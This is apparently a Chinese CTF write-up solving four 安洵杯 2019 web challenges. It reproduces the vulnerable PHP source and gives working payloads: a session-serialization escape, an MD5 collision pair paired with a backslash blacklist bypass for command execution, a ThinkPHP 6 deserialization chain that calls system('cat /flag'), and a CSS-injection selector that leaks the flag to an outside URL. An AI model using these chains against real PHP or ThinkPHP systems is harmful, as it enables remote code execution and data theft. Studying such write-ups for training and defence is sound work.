[安洵杯 2019]easy_serialize_php
php
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
} 简单看了下phpinfo()发现:auto_append_file:d0g3_f1ag.php
显然我们就是要去读这个文件!手段就是控制$_SESSION['img']='ZDBnM19mMWFnLnBocA=='
一看一个反序列化的洞,原本是没有利用空间的,但是extract($_POST);的出现导致我们可以覆盖
那么剩下就简单了,字符串减少逃逸!
php
<?php
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
$_SESSION['user'] = 'flagflagflagflagflagphp';
$_SESSION['function'] ='";s:8:"function";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img']='ZDBnM19mMWFnLnBocA==';
$serialize_info = filter(serialize($_SESSION));
echo $serialize_info;
$a = unserialize($serialize_info);
var_dump($a);
?>写这个exp主要是为了看看我们要逃逸的字符是哪些,为了方便赋值!
payload:
XML
?f=show_image
post:
_SESSION[user]=flagflagflagflagflagphp
&_SESSION[function]=";s:8:"function";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}这里特别注意是没有$这个的!然后就拿到flag了!
[安洵杯 2019]easy_web
什么鬼?很容易就可以发现有个任意文件读取的洞!这里有些无语我两次base64解码之后以为得到的是md5,但是md5是32位这里显然不是!然后再解码发现是16进制
那么就先去读源码index.php
php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>md5强比较用:
XML
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2如何虽然过滤了那么多,用\就好了!cmd=ta\c /flag!即可拿到flag
[安洵杯 2019]iamthinking
tp6的一个反序列化洞,不是很会,直接拿payload来打吧!
php
<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key" => ["key1" => "cat /flag"]];
private $withAttr = ["key"=>["key1"=>"system"]];
protected $json = ["key"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
private $exists;
private $force;
protected $table;
protected $jsonAssoc;
function __construct($obj = '')
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj;
$this->jsonAssoc = true;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));/pubilc/?payload=
传参即可!
[安洵杯 2019]cssgame
这题整不出,要配置一些东西!但是我之前反弹shell配置了内网的映射啊!
现在用不了,难绷!
考的知识点就是css注入,原理就是利用css的选择器
input[name=flag][value^="f"] ~ * {background-image: url("http://x.x.x.x/?flag=f");}
先找到name为flag的input元素,然后如果是以f开头的就访问后面那个url,于是我们就可以开始爆破,主要控制value^="f"与url进行一个映射!但是题目不出网,所以我们内网映射,然后起个pythonweb服务........但是我弄不了!有会的师傅,教教我!